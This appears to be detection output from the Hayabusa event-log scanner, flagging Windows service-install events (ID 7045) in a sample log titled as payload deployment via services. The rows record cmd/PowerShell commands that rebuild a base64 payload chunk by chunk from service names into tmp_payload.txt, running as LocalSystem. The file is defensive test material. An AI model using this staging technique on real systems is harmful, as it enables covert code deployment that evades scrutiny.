tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 